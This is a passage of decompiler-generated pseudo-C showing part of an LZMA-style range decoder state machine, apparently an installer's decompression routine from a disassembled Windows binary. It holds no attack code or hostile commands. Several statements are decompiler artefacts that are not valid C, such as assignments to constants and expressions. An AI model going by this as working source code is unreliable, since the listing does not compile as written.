											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
